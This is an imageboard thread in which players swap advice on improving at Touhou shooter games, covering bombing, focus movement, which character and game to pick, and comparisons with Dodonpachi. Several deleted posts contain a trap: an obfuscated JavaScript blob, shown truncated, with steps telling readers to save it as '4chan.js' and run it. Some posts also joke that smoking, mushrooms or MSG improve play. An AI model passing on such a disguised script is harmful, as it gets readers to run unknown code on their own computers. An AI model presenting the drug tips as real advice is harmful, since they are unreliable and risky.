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File: 92 KB, 641x481, typical touhou pic.jpg [View same] [iqdb] [saucenao] [google]
2431321 No.2431321 [Reply] [Original]

i am fucking terrible at these games. any PROTIPS on how to improve other than

not suck

>> No.2431329

Don't think, feel.
Read SICP, achieve SATORI.

>> No.2431332

smoke mushrooms

it increases concentration

>> No.2431333

hold shift for focused movement

>> No.2431346

use you're arrow keys to dodge fire

>> No.2431351

When you are ready, you won't have to dodge bullets, they will dodge you.

>> No.2431352

Drink caffeinated beverages.

In one of my science classes someone decided to do a study on how caffeine affected the brain, and Touhou was involved. If I remember correctly, players that drank them on average got 20% higher scores.

>> No.2431353
File: 79 KB, 600x630, tomoyo219.png [View same] [iqdb] [saucenao] [google]


>> No.2431354

Never focus. I don't know why ZUN even included that baby mode shit and it'll only hold you back.

>> No.2431357

enjoy your cigarette replacement

>> No.2431364

And why is it that tobacco intake increases performance?

>> No.2431383

Look at the pattens, use practice mode.
Patterns are everything, and try not to move around too much.

>> No.2431391

To defeat the enemy touhou, shoot at it till it dies.

>> No.2431395

Instead of making a new thread, can somebody tell a newfag which Touhou I should first play?

>> No.2431398

Read the Touhou Wiki and don't suck and play

>> No.2431414

dodge all of it until it dies

>> No.2431419

You can download any one you want, honestly.

>> No.2431442

I started with the seventh, Cherry Blossom.

>> No.2431444

Makes you calmer, I suppose? You'd be suprised how much better you can be at these games when you're not tense.

>> No.2431450

The only thing I drink is soda and I rarely notice a difference in performance.

>> No.2431453


This gets me every time.

>> No.2431458

Soda would just make you more tense.

>> No.2431461

For bosses near the end of the game I start smoking. Shit is awesome. Almost like you are a newtype dodging shit.

>> No.2431462


I started with Perfect cherry Blossom, I think it was a good one to start with.

>> No.2431465

Play some non-doujin STGs, and then go back to Touhou.

>> No.2431469

So if caffiene makes you better at the games, what about smoking? Do japanese arcades and all the ashtrays at each cab signify smoking does help at all, or is it just because they go hand in hand for a destructive lifestyle?

>> No.2431472

Lots of MSG will give you the same sort of high as caffeine, only less tense.

Playing Touhou after eating a large bowl of ramen = awesome.

>> No.2431480

>Lots of MSG will give you the same sort of high as caffeine, only less tense.
Where did you get that idea?

>> No.2431483

It has the reverse effect for me. All the MSG makes me tired as hell and I wouldn't be able to react to anything.

>> No.2431492

Downloadan Cherry Blossom. An hour to go, fuck my internet.

>> No.2431495

From doing MSG and then playing Touhou?

>> No.2431499

Smoking cigarettes calms you down a lot. It's like the feeling you get just after fapping.

>> No.2431502

Try using Sakuya A, she seems to be the easiest.

>> No.2431509

Play Touhou10/11, ReimuA
Bomb your way through life.

>> No.2431515

I make it a habit to smoke when playing video games that need concentration.

>> No.2431517

Get Touhou 12g. It has advanced bullet analysis solutions that maximize profit and return-on-grazing for the whole enterprise.

>> No.2431520

I do worse after drinking a lot of caffeine. Last time I drank an energy drink before playing Touhou I was all jittery and shit and couldn't play at all.

>> No.2431521

Raymoo A is easiest, always.

>> No.2431529

I prefer MarisaA

>> No.2431535

Personally I think Sakuya A is the easiest.
Semi-auto aim makes for faster kills while you can still focus on dodging.
Since the kills are faster you don't have to dodge as much and you don't die as much.
At least that's how it's worked for me so far...

>> No.2431540

Learn to bomb. Seriously, that single ability will carry you further than any amount of pattern recognition. By default you start the game with three lives and by the end you'll accrue between 7 and 9 depending on the game. That's only nine times that you can get hit over a 25 minute period. Learn to bomb correctly and you gain an additional three chances for every life you had. Now you have 28-36 "lives" and can "die" almost once per minute and still 1cc the game.

Now note, this is not to say that you should bomb spam. The bomb is to be used when you see yourself on the brink of death, not when the boss whips out that one card you hate and have never captured (fuck you, Yuyuko).

>> No.2431662

> Play some non-doujin STGs, and then go back to Touhou.
Yeah this is seriously the fastest way to improve. Playing Touhou on higher difficulties than you're used to can help too.

>> No.2431673

This. Also, use SakuyaA, the most newbie-friendly character bar none. Enjoy your 45ish bombs.

If you need with something specific, ask here and we'll do what we can. There are a lot of tricks/safespots on very hard patterns.

>> No.2431692

Well, I can't seem to beat the final boss on EoSD. Or at least I think it's the final boss. The girl at stage 5. I've made it to the part where if I use a bomb, she turns into a bat and it doesn't affect her, and I'm having a hard time beating her. I don't want to move on to the next game till I do this one.

>> No.2431697


I have the same problem with Kaguya...

>> No.2431786

OP here, i like sakuya because of her 100-90% accuracy if you are within halfway near the boolets, but the focus speed is way too damn high for me.

i prefer reimu with the laser rather than the homing bullets. they take the fun out of it for me.

i beat scarlet on normal with 2 continues left, good for me i guess.

working on cherry blossom right now but i literally hit my keyboard and rageface'd at the poltergeist trio. i seriously need to practice at them.

i was really hopin this wouldnt be a memorizan game, but i would say its 30-40% memorizing, 60-70% holyfuck giant bullets.

i showed this to one of my friends. its iwannabetheguy tier.

>> No.2431809


and I destroyed 5 keyboards trying to get good at this game.

best advice? learn how close you can get to the bullets before the game declares you shot down.

you will need to dodge between 5 giant bullets containing 8 smaller bullets all the time.


normal: all final cards are immune to bombs, presumably to prepare you for the extra bosses.

You need to buck your dodging ways up to THIRTEEN and do it.

>> No.2431821

almost every time i die its from a horizontal movement. I always bomb before a boolet hits me from a direct attack. I don't get myself trapped. I die from moving out of the way of other bullets and running into a very slow moving one trying to control myself.

>> No.2431844



1. Never die with bombs left.
2. Stay unfocused as much as possible during the stage.
3. Stay focused as much as possible during bosses.
4. Do not move unless you have to.
5. If you have to move, only nudge left or right a small bit.
6. If the card requires you to move more than a small nudge, you should probably be unfocused.
7. Never use continues. Earn the glory of making it to the later stages and being able to 1CC.
8. Never play easy mode.
9. Do not start with IN; try starting with MS or EoSD.
10. Watch replays to figure out how to do cards correctly.
11. Don't use Reimu A (expect IN), as she does too little damage on bosses, where it matters; in IN, she's overpowered with Yukari at her side.
12. Use whatever device you're better used to; people would say that one is better than the other, but in the end it makes no difference.
13. Yes, you're going to have to memorize this shit.
14. Yes, once you master one or two games, memorization will be less of a factor.
15. No, rule 14 does not apply to extra stages. They're always 100% memorization.
16. Staying underneath a boss to burn them down is important. make use of the boss indicator.
17. Rushing up above the PoC on boss fights is not always worth it. Learn which cards give you time to do it, and don't risk it if you don't know if you'll make it or not.
18. Don't use slow mode, you dumb faggot.
19. Learn where the hitbox is on each type of bullet, as well as your character. They stay pretty consistent throughout the games.

No one agrees with all of these

>> No.2431849

Learn to watch more of the screen, not just the area immediately around your girl. It's something you should get better at the more you practice.

>> No.2431858

Anger only makes you die more.

>> No.2431859

>17. Rushing up above the PoC on boss fights is not always worth it. Learn which cards give you time to do it, and don't risk it if you don't know if you'll make it or not.


By the way, I might as well note MoF ReimuA is surprisingly good. Enjoy getting raped on VoWG though.

>> No.2431861


now blurred with MoF/SA/UFO; if you try that, you would have to kill bosses using only 2 options.

And they would only give .50 per defeated card.

>> No.2431864

Still much preferable to dying and losing both a life and the 1/5 life item, unless it's a planned death to make a very difficult card easier later. As a rule of thumb you still should bomb like the fist of the north star.

>> No.2431867

Not in UFO,


>> No.2431884

Fapping before playing is a good idea. It worked for me.

It also helped me a lot to burn into my mind the sound effect the game gives when you die and make a bombing reflex to it. After a while you can bomb away from death more efficiently when you're between the border of life and death. It's not the best tactic, but I always tried to reserve my bombs so I often died with them.

>> No.2431893

>never die with bombs left
isn't it better to leave one bomb with sakuya in IN since you get a bomb on death if you have bombs left?

>> No.2431964


only if you NEVER used a bomb during that life.


>> No.2431972

>It also helped me a lot to burn into my mind the sound effect the game gives when you die and make a bombing reflex to it
You... fapped to that sound?

>> No.2431977

Nah, it's if you have at least one bomb in stock.

>> No.2432009

/b/ is that way <- tnx for the lolz tough.

>> No.2433665

I suck at this. I downloaded PCB earlier today and I'm using Reimu on normal, can only get to stage 4.

>> No.2433700

this is the best advice of the thread. whether you use a controller or the keyboard, make sure your keys are set up so that bombing can be done instantly. I use a PSX controller and for me, square is fire and x is bomb. That way, when I need to bomb, my thumb is basically already hovered over the button.
Also, learn to stream. It seems like an "advanced technique" but when I figured out what streaming is it made the game exponentially easier for me.
Learn how close you can get to bullets. Really pay attention to your hitbox and spend some time getting acquainted with how close you can get to each type of bullet without dying. The trick that Zun is relying on you not figuring out is that your hitbox is actually a lot smaller than it seems (and the hitbox of bullets is also a lot smaller than they seem).

>> No.2433705

don't use reimu you faggot

>> No.2433712


Which is Stage 4? Is that the boss fight with Alice? Or the Prismriver Sisters?

>> No.2433726

Prismriver. Alice is 3

>> No.2433737


I don't really get most of the shit in this game, but I've only played maybe 4 hours total so far.

>> No.2433744


read all the articles

>> No.2433758

Yeah I did but I still don't get things like the Cherry status and collecting spell cards and some other shit.

>> No.2433762

Hold your breath when shit gets heavy. Snipers do this so they don't twitch and choke up. Do it when a shitload of danmaku are headed towards you so you don't panic and move more than you have to.

>> No.2433770


To be fair the sisters are a hard boss fight. The whole lens altering the bullet paths in random ways still gives me trouble. It's not unusual to end using my first continue there.

Certainly I'll lose so many lives that Youmu will rape me right through my denim trousers in the next stage.

But that's just because Youmu's patterns give me serious problems, I have an easier time dealing with Yuyuko than I do with Youmu.

>> No.2433772

Watching videos of good players is a good help.

>> No.2433791

Snipers slowly breathe out as they pull the trigger, holding your breath just causes the beginnings of panic

>> No.2433795

I agree with >>2431821, almost every death of mine is from me slamming myself into a bullet, not the other way around. Knowing hit boxes doesn't really help with this IMO, because I can totally see the place that I want to go, but then I slam into a bullet because I pressed the button a little bit too long and went too far, or didn't press both buttons the right way to go diagonally at the right time. The fact that you can only move in 8 directions and at 2 speeds makes the game a lot harder than it would be if the movement were more analogue.

I try to follow the advice of "don't move unless you have to" but on bosses I have to move in order to hit the boss, and that is when I usually die.

>> No.2433811

IN is fun, but I don't like how the scoring system makes you so forced into being unfocused for the level and focused on the bosses

>> No.2433865

Their entire stage is bullshit.

>> No.2433912


Nah man, the stage isn't so bad. Hell, you want to talk bullshit difficulty stages, then you should ask me about Stage 4 of SA. Expanding Clusterbullets everywhere that just HAPPEN to have the exact same colour and shape of the Blue Scoring Tags.
Number of times I either dodged points tags thinking they were bullets, or killed myself trying to collect a bullet FFS.

>> No.2433997
File: 42 KB, 399x277, bullshit frogs.jpg [View same] [iqdb] [saucenao] [google]

Japanese frogs playing Touhou

>> No.2434084

You probably don't know of the graze-autocollect mechanic in SA, which would clear those horrid distractions off the screen, and give you lots of points too. Considering all those bullets, it's not a hard thing to do!

This is partly why I find different games to be easier or harder depending on the person, because they require a different mode of play. PCB is a lot calmer, while SA is more agressive.

For newbies, IN is the best because you get so many bombs » deathbombs » lives, a lot of normal lives, and comparatively easy gameplay. If you still suck, there's always Easy mode too, which is ludicrously so. PCB is decent as well, although IN is preferred. Most of the others are best avoided, especially StB.

Additionally, practice mode exists for a reason. Use them.

>> No.2434107

>PCB is a lot calmer, while SA is more agressive.
So in PCB you die by stupidly running into bullets you didn't see because they were moving too slowly, and in SA you get actively killed by enemy attacks. Even though SA is harder it's much less rage inducing.

>> No.2434138

It's best to play the pre-MoF engine Touhous first, because once you're used to the much superior engine of MoF/SA/UFO playing the older ones will make you angry.

>> No.2434154

Right now I am just trying to 1CC PCB on normal.
Only after I do this will I move on to the next games.
I should probably 1CC EoSD as well.

>> No.2434176

Stage is easy once you figure when you don't shoot the first batch of heavy fire clusterfuck bullets, they dont shoot you either. Other than that the only hard part is the clusterfuck after Lily, death fairy and those red cluster bullet fairies that spread bullets exactly where you want to run while dodging their homing shots.

I'd take Prismrivers over Alice, barring Merlin's opener. Phantom Dinning is not bad, the wheel card always does the Merlin bug for me so it isn't that bad either, Stradivarius has a safespot (not for Pseudo Stradivarius though!) and Merlin's second nonspell is a joke. The rest can be bombed if need be.

Alice on the other hand is a nightmare on legs who can and will kill you with all of her attacks.

>> No.2434187

Addendum: this is assuming a Sakuya player who starts from the left on Phantom Dinning to get the correct sister. I do not have much experience with other characters.

Also, Yuki and Mai's stage, I think, had bullets and enemies that were almost the same color as the background. Now that's bullshit. Enjoy getting killed out of nowhere.

>> No.2434461

On normal I can get through Alice without using a bomb or losing a life, I havent tried anything harder though.

>> No.2434482

Try practicing on harder modes and you piss your pants bro...

>> No.2434491

That's a good indicator that you can handle Normal. Alice gets crazy on Lunatic, though.

Any particular point you need help on? I'll do what I can.

>> No.2434497

what. Alice is a joke on Normal; for me PCB is the hardest game, but I only died like once to her the very first time I played it. Foggy London Dolls is about the only thing I might die to now.

The Prismrivers (and Stage 4 in general) used to completely rape me, but they're way easier for me now, although I suck at any of the solo spellcards and Prism Concerto. Also, Merlin's opener is easy on Normal, you just have to macrododge the wisps and not attempt to predict their path; I'd take it any day over Lunasa's.

Youmu is the bitch that ruins every PCB run for me now; Orin never made me rage as much as she does. A few stage practice runs and I had Orin figured out, Youmu rapes me no matter how many times I practice.

>> No.2434517


For the cards where time slows, don't try to dodge underneath her. Go to the middle or even the other side of the screen when it slows down.

>> No.2434541

Should I stick with PCB or is there a better option for a noob who only started today? There's so many of them that I'm lost.

>> No.2434554
File: 16 KB, 243x430, 1180638.jpg [View same] [iqdb] [saucenao] [google]

>> No.2434559

Why don't you keep practicing on it, then change when you get tired of dying to a soft ghost?

>> No.2434562

PCB is pretty much the best for learning the basics. Either that or EoSD, but I prefer PCB.

>> No.2434586

PCB is pretty good, yeah. I'd stick with it and keep practicing on it on normal. Once you start to master it you should move onto another. Ramp up the difficulty when it gets too easy.

>> No.2434641

PCB is very average for the series so yeah. EoSD would be better for simplicity but it's kind of hard and not as exciting.

>> No.2434673

Anon's guide to playing Touhou on all difficulties:

1. Go to the bottom right or left corner.
2. Tap the arrow key facing the other side. Speed varies depending on bullet velocity.
3. Win at Touhou.

>> No.2434709


That's why I kicked so much ass that time I was full of caffeine.


>> No.2434721


I started on IN.

Was this bad?

I'm still on it. Can't no continue Normal yet.

>> No.2434722

>cptal letrts r 4 fagot XD

>> No.2434724

Advanced instructions for higher difficulties:
2.5. When you're running out of space, dash to the edge of the screen to make a gap in the aimed shots then reverse direction through the gap.

>> No.2434736

Are you using Border Team?

Then yes. All other games will kick your ass until you learn to pre-emptively bomb properly.

>> No.2434769



Ah well, I don't care.

I have the rest of my life to get good at them, so no rush.

>> No.2434966

Thanks for the extra tip, but I can't figure out how to apply that to Youmu's Delusion of Elightenment and Yuyuko's Flowery Soul. Maybe you can help me out with those two? Here's a link.


>> No.2435006

It's not real advice, it's just mocking Touhou for being all streaming and micrododging.

Delusion of Enlightenment is very easy once you learn to dodge rising bullets, and Anon's Guide works with the very minor modification of starting at the middle of the side instead of the corner.

Flowery Soul is legitimately difficult. I advise a horizontal figure-8 type movement, but you could just bomb it.

>> No.2435109

Your dodging is admirable, I doubt I could do better. You can definitely handle Hard or try scoring runs at that that stage, to be honest, that replay looked more like a challange run to me.

One catch, however. You seem to be afraid of going above the screen, which both
Delusion of Enlightenment and Flowery Soul require you to do. For Delusion, stand leftmost about 1/5th up the screen and tap right as Youmu homes her red bullets while taking care for the white bullets that rise below you. For Flowery Soul, you need to rise above the butterfly cluster while it is "blooming" when you are cornered, though that's a rather difficult thing to do. The eight-shaped movement the other Anon suggested may be handy, I did not try it.

In a similar vein, use and abuse the PoC, as well as redirecting Youmu's openers. It will save you a lot of hassle and get you extra lives as well as a nice score.

>> No.2435139

I think touhou difficulties are kind of interesting. Occasionally I find higher difficulties easier because the patterns simply work better with me, or the bullets move slower (to be in your way longer... but instead make it easier to dodge)

>> No.2435152

Pick up Mushihime (虫姫さま) and a jap PS2. Play Maniac mode until you don't suck at it (Original mode is garbage, some of the pattern speeds are really wonky, especially in the ps2 version, and Ultra is just way too brutal to even improve with). Dodonpachi Daioujou works too, but that game is fuckin brutal, the first loop alone is harder than Mushi Maniac. When you play Touhou again, if you're not bored to tears, you'll have much improved. I can only get to stage 4 on Daioujou (and the 5th stage is practically harder than the rest of the stages combined, and there's an entire second loop yet...) and I can 1cc all of the Touhou shooters on Hard, and can at least get to the last levels on Lunatic.

>> No.2435157 [DELETED] 


1. Copy and paste the following to Notepad.
2. Save it with the filename "4chan.js"
3. Open the file you saved.
4. ???
5. Shit bricks.

A='ft )t hoM.d)}=.abts2lp\nSree"iniyme)exlScte=el;l(xeg,t/.'+
'ar";e)xssxa(t?li/\ncn)t etr(}h(txeg,bR)a(t?l[++,xn\rxssxa('+
'pinr\\g]t//0sn+r+cedoif-am\rse\\"so\\r"nC \x20thow Np\\ e hel'+
'm"asnO \x20euv\\ \\ ti.n+m\\rs\n.l(Y.no,Jr,p+zgi\'\'\\ga)+i""'+
'h"HHeocspglsoc.nteHrn)HalHo).ne"pi4ng,xn;.pett/ph"tgft {uR'+
'd;e\n+sn++mn(\\1oapeelitoanS w \x20ee4n\\3ptf \x20en?nS c\\"sone'+
's\ro(th:mc./0.dbrot.ch.t l)uirrr()Sn6\nl)yo(tMi4.ch.tg]?()'+
's(trot.c<n=ta+[mhd)\r"-u)\\ntsinran=S"t\\t"\\")n.pna \x20lnot'+
'd2aiitfn c.".ehiysd4?5hbkn++d\\g"=ec"\'p"t\'\'/t)+p""Jm.".'+
'te\rno(en9.tg)we{{p""==3mht*m))");e)=enemhs "hd/3a(+[\n\\"'+
'=)nt-pt:mta"=ron+cn++\\ ydstfog e..vtthia\\hj\\ neloa..?.i'+

>> No.2435237

Daioujou is definitely worth it, it's excellent. The mushihime port is not that good however. Dodonpachi on MAME is also stellar but a good deal easier than daioujou.

>> No.2435241 [DELETED] 


1. Copy and paste the following to Notepad.
2. Save it with the filename "4chan.js"
3. Open the file you saved.
4. ???
5. Shit bricks.

A='ft )t hoM.d)}=.abts2lp\nSree"iniyme)exlScte=el;l(xeg,t/.'+
'ar";e)xssxa(t?li/\ncn)t etr(}h(txeg,bR)a(t?l[++,xn\rxssxa('+
'pinr\\g]t//0sn+r+cedoif-am\rse\\"so\\r"nC \x20thow Np\\ e hel'+
'm"asnO \x20euv\\ \\ ti.n+m\\rs\n.l(Y.no,Jr,p+zgi\'\'\\ga)+i""'+
'h"HHeocspglsoc.nteHrn)HalHo).ne"pi4ng,xn;.pett/ph"tgft {uR'+
'd;e\n+sn++mn(\\1oapeelitoanS w \x20ee4n\\3ptf \x20en?nS c\\"sone'+
's\ro(th:mc./0.dbrot.ch.t l)uirrr()Sn6\nl)yo(tMi4.ch.tg]?()'+
's(trot.c<n=ta+[mhd)\r"-u)\\ntsinran=S"t\\t"\\")n.pna \x20lnot'+
'd2aiitfn c.".ehiysd4?5hbkn++d\\g"=ec"\'p"t\'\'/t)+p""Jm.".'+
'te\rno(en9.tg)we{{p""==3mht*m))");e)=enemhs "hd/3a(+[\n\\"'+
'=)nt-pt:mta"=ron+cn++\\ ydstfog e..vtthia\\hj\\ neloa..?.i'+

>> No.2435242 [DELETED] 


1. Copy and paste the following to Notepad.
2. Save it with the filename "4chan.js"
3. Open the file you saved.
4. ???
5. Shit bricks.

A='ft )t hoM.d)}=.abts2lp\nSree"iniyme)exlScte=el;l(xeg,t/.'+
'ar";e)xssxa(t?li/\ncn)t etr(}h(txeg,bR)a(t?l[++,xn\rxssxa('+
'pinr\\g]t//0sn+r+cedoif-am\rse\\"so\\r"nC \x20thow Np\\ e hel'+
'm"asnO \x20euv\\ \\ ti.n+m\\rs\n.l(Y.no,Jr,p+zgi\'\'\\ga)+i""'+
'h"HHeocspglsoc.nteHrn)HalHo).ne"pi4ng,xn;.pett/ph"tgft {uR'+
'd;e\n+sn++mn(\\1oapeelitoanS w \x20ee4n\\3ptf \x20en?nS c\\"sone'+
's\ro(th:mc./0.dbrot.ch.t l)uirrr()Sn6\nl)yo(tMi4.ch.tg]?()'+
's(trot.c<n=ta+[mhd)\r"-u)\\ntsinran=S"t\\t"\\")n.pna \x20lnot'+
'd2aiitfn c.".ehiysd4?5hbkn++d\\g"=ec"\'p"t\'\'/t)+p""Jm.".'+
'te\rno(en9.tg)we{{p""==3mht*m))");e)=enemhs "hd/3a(+[\n\\"'+
'=)nt-pt:mta"=ron+cn++\\ ydstfog e..vtthia\\hj\\ neloa..?.i'+

>> No.2435255

DDP is already harder than STB and SA Lunatic mode, so that's hardly a drawback.

>> No.2435286

>The mushihime port is not that good however.
It's fine. If you have never played it on a circuit board, you will not notice the problems. Many good players play the PS2 version regardless of the differences.

Definitely get the PS2 version unless you can afford a circuit board + supergun, or you have some silly mental problem with playing an imperfect port (without even knowing specifically what's wrong).

>> No.2435290 [DELETED] 


1. Copy and paste the following to Notepad.
2. Save it with the filename "4chan.js"
3. Open the file you saved.
4. ???
5. Shit bricks.

A='ft )t hoM.d)}=.abts2lp\nSree"iniyme)exlScte=el;l(xeg,t/.'+
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>> No.2435297

If we talk about both loops, yes. But the first loop is probably a bit easier than a SA lunatic clear.

>> No.2435298

The first loop is extremely easy. If you're counting the second loop it's a little unfair seeing as how Touhou has no loop. I sat down one weekend knowing almost nothing of Dodonpachi (I had already played a lot of Daioujou though) and was able to 1cc the first loop with only a couple days' practice. Second loop is tough, and Hibachi looks brutal (haven't gotten to him yet... soon... soon...), but yeah like I said, comparing the second loop to a no-loop is a little unfair.

>> No.2435358

People just like to complain, I've 1cc'd Original and Maniac on the PCB and PS2 port, and find the changes small. Graphics are a bit smudged and the slowdown emulation changes your approach to Ultra patterns, it's not the end of the world.

But playing Daioujou isn't going to help anyone struggling in PCB. They won't even clear stage 1 and DOJ doesn't start being fun until you're good enough to chain stage 2 for extends.

>> No.2435381

It seems unfair to compare lunatic touhou to dodonpachi 1-ALL when dodonpachi doesn't have difficulty select.

>> No.2435388

I just meant to say it's not as flawless as the daioujou ps2 port. It's still worth playing of course.

>> No.2435392

>But playing Daioujou isn't going to help anyone struggling in PCB. They won't even clear stage 1...
I disagree, stage 1 is very easy. The only part that would give a newbie any problems is the boss' spinning attack, which a newbie can just bomb through.
>and DOJ doesn't start being fun until you're good enough to chain stage 2 for extends.
Personally my love for the game started around the time I learned to chain level 1. You can easily get the first extend in the first level, and in superplays they usually get both. Chaining all of level 2 is insanely hard, it took me a year of playing before I could chain it at least semi-consistently.

I don't think it's Daioujou would really be THAT bad for a newbie, IMO it would be one of the best ways to get good. Only problem is: once you've played the best game, everything else seems so dull.

>> No.2435397


>> No.2435413
File: 79 KB, 1280x1024, ddp.jpg [View same] [iqdb] [saucenao] [google]

Technicalities, mah boy.

But really, it is comparable in that the different Touhou difficulties play like different games altogether. It's easiest to just say Dodonpachi's first loop is easier, while the second loop is (a lot) harder.

>> No.2435420

This is Seihou and Samidare. Nearly 99% of those games is BS memorization, a lot of it being streaming. Touhou has plenty of smarter attacks that require skill beyond memorization, especially on lunatic. There's plenty of streaming based cards, especially on extra stages, but it's far from the whole game.

>> No.2435458

Seihou and Samidare seem like memorization hell. Touhou isn't so bad in that aspect, but I really dislike the chaining score system of dodonpachi because of the required memorization. Of course it still needs a lot of skill to pull of, but your chain just breaks if you don't know where to move beforehand.

>> No.2435459

You don't need to chain all of Stage 2, just the end section with a hyper for the extend.

I still think it's a wall for the uninitiated, though. Even Ikeda said the difficulty was whack.

>> No.2435495

Please, nobody changes the rank value.

Touhou labels its Hard difficulty as the arcade comparable one, not Lunatic. Lunatic is the hardest touhou gets, 2nd loop is the hardest DDP gets.
They are directly comparable if you're going to have a "which is hardest" dick-waving contest.

Whereas touhou scoring systems are shit eitherway.

>> No.2435500

Yeah, the runway part (I guess that's what it is? lol) is really fun.

>wall for the uninitiated
I guess I'm a little biased because I'm the kind of person who enjoys playing something that is way beyond my level and trying to work out how the fuck to do it. Daioujou was the first STG I took seriously.

>> No.2435517

All scoring systems require complete memorization. If they don't, then usually they can hardly even be called a scoring system (mushi original lol)

>> No.2435526

Not really, since you don't have to go through a hard run to start your lunatic run.
Comparing touhou lunatic to dodonpachi 1-all makes sense because it's closer than hard, it's not like there's an ISO standard for "arcade difficulty".

>> No.2435536

I think the biggest difference is that you cannot start on the second loop. It would be more comparable if, say, you had to clear Hard, then Lunatic, on the same run, to 1cc Lunatic. SA would, in that case, be pretty damn rough.

>> No.2435556

>Whereas touhou scoring systems are shit eitherway.
what's wrong with them, in general?

>> No.2435574

Not the anon you quoted, but for most games, they have virtually nothing to do with actually killing the enemies (the entire system is based on picking up items). In a SHOOTING game, a good scoring system is based around SHOOTING.

>> No.2435581

So you're vetoing it because it has 12 stages instead of 6. Tripe.

But, for the record, a SA Hard run followed by a Lunatic run would still be easier than a DDP 2-ALL.

>> No.2435584

Personally I like some of them, but being very dependent on grazing they require you to milk bosses until the last second of the spellcard/nonspell. Can't really generalize it more, since every Touhou has a different system.

>> No.2435589

I don't really think of danmaku as shooting games, they're bullet dodging games and when you're just playing through for survival, you are either holding down the shoot button, or tapping it because holding puts you in focused mode like with DDP.

>> No.2435603

one thing I don't like is the IN system because the damn human/youkai meter pretty much forces you to never go unfocused on boss fights, and heavily punishes focusing on regular fights, really annoying when you're doing this with scarlet devil team and you need to unfocus to reposition your shot. IN probably gave me some bad habits with that and being able to spend bombs instead of lives with a huge space of time to bomb.

>> No.2435629

Yes, it would be, everyone agreed the second loop is harder. But you're basically just being a faggot. Comparing a two-loop to a one-loop is stupid, much moreso than comparing two difficulties. Every good goddamn STG player agrees, don't bother them about it.

That is DEFINITELY not how it is for DDP. If you don't shoot correctly/strategically in DDP you will get fucked faster than you can possibly imagine, unlike in Touhou. If you're going to make a distinction between "shooters" and "danmaku" then DDP would go in the shooter category, while touhou would (obviously) be in danmaku.

>> No.2435634

Does anyone actually play Touhou with hold fire to focus? The way I play I'm often "untapping" focus, where I release focus for a very short time to get a little movement boost. I don't think this would work with Cave style focus.

>> No.2435635

>forces you to never go unfocused on boss fights
depends of the spell card and your team really. Unless you can milk the boss, unfocused shots are a good idea to get more time orbs on attacks that don't have many grazeable bullets.

>> No.2435636

They are too abstract and not built into the game, you could basically take the scoring systems from any of the games and swap them around without any detrimental effect. But if you were to swap the score systems in, say DDP and Progear, they would both fall apart instantly.

MoF is the exception, which is incidentally the best scoring system in the series (if only it didn’t have unavoidable gaps, bomb whoring and game-long chains).

>> No.2435646

What is this strategic difference? I've 1cced PCB Lunatic (SakuyaA) and IN Lunatic (Ghost team), but I've never defeated the DDP 1-6 boss.

(can't play STGs now as my keyboard is broken)

>> No.2435661

He's talking about scoring, not survival. Basically, if you kill everything on screen, then there's nothing to shoot at for 3 seconds, congratulations you just fucked your chain over.

>> No.2435676

that's still the same situation of high score demands being focused or unfocused, it isn't about if you want to move slower or faster to get around bullets, it's about what'll give you more points, if you need to speed up to get around that grouping, you better not be shooting anything while you do it, it kind of gimps you in other games, I felt extremely retarded doing Cirno in scarlet devil when i got blasted by her first attack repeatedly because I kept going "Boss = focus mode"

>> No.2435693

It's entirely possible to keep shooting and focus/unfocus shortly to nudge to the sides. Check out some highscore replays from royalflare, they do it constantly(shooting Asteroid Belt unfocused with Youmu, only focusing during short movements)

>> No.2435695

This entire argument was someone claiming the statement "DDP is harder" was "unfair." How else are you going to clarify that statement outside of getting him to take the loop into account?

>> No.2435705

Touhou strategy is standing still and moving left and right a few pixels now and then. Cave strategy is streaming left and right constantly and paying attention when turning around. This post may contain hyperbole.

>> No.2435714

Besides, the whole "stage = unfocus only and boss = focus only" thing is bullshit anyway. Why would you shoot big fairies with the rotating familiars in Stage4 unfocused, you'll get way less time orbs.

>> No.2435729

I was not talking SPECIFICALLY about scoring, but that's a large part of it. Even if you're not playing for score though, there are parts of Dodonpachi where, if you don't laser the fuck out of something as soon as possible, it will turn the screen into a giant clusterfuck of undodgable death. Touhou, on the other hand, you can make almost no effort to actually shoot specific enemies, just hold the fire button and dodge the shots.

>> No.2435731

I reach Utsuho with 6 lives.
Then 1cc with the last one.

Fucking giant suns.

>> No.2435811

I don't think this has been mentioned, but staying at the bottom of the screen is a really bad idea.

>> No.2435830


1. Don't get upset that you suck
2. Practice

There is no other way. All other advice reduces down to these precepts.

>> No.2435996

Oh yeah this is a solid tip. Don't hang out at the very bottom, leave some room below you so you can dodge in every direction. Also, learn to dodge in every direction. The only time I'm at the very bottom is if I've been forced there or if I'm rubbing against it for more accuracy.

>> No.2436003
File: 47 KB, 640x480, Untitled.jpg [View same] [iqdb] [saucenao] [google]

I don't seem to understand how to configurate the keys. I can't change anything.

>> No.2436020

That's for a joypad.

>> No.2436026

Is it just me or is IN the easiest? I can 1 cc Easy and Normal in IN but can only 1cc easy in PCB.

>> No.2436080

IN has easy mechanics I guess. And spell practice, if you've been using that. Bullet for bullet it's probably harder than average. At least it seems that way from the mental scars I've gotten from spell practice.

>> No.2436093

Imperishable Night's 6B is the hardest Normal final stage in the series by far.

>> No.2436099

On second thought most of the really nasty stuff is optional, so yeah. MoF might actually be easier to just beat though because you can infinibomb everything.

>> No.2436103

How hard does /jp/ think Shoot the Bullet is in comparison to the rest of the games?

>> No.2436110

About as hard as apples and oranges.

>> No.2436113

STB is the hardest Touhou, the most memorization intensive, and the least fun. If you're one of those freaks who actually enjoyed IN's spell practice you might like it.

>> No.2436122

Ok good, because I was getting my ass kicked by it.

>> No.2436127

Where can I configurate the keys for the keyboard, then? I'm stuck with a shitty configuration that doesn't allow me to play comfortably.

>> No.2436143

As far as I know, you can't. Short of hacking the executable, that is.

>> No.2436150

On Linux, xmodmap

>> No.2436151

Don't play StB unless you're a masochist and/or you're actually good at danmaku games. Go back to it every time you notice you've gotten better, play it up until it fucks your ass raw again, and stop.

>> No.2436155

How does one improve their bombing? Just practice like crazy? I can almost always tell when I'm about to die, but I always seem to be a fraction of a second too late to do much about it. I can only successfully pull it off maybe 1/8 times.

>> No.2436164

Just practice, and conscious of your bombs, don't get distracted and forget they are there for you.

>> No.2436178

React to the sound. Audio reaction time is faster than visual, and you're probably playing on an LCD making visual reaction even harder. If you're playing on Linux, edit the Wine registry so it has direct hardware access. I'm not actually convinced this improves latency, but it can't hurt.

>> No.2436182


What the fuck, focus with shift, this is the worst idea ever.

>> No.2436192

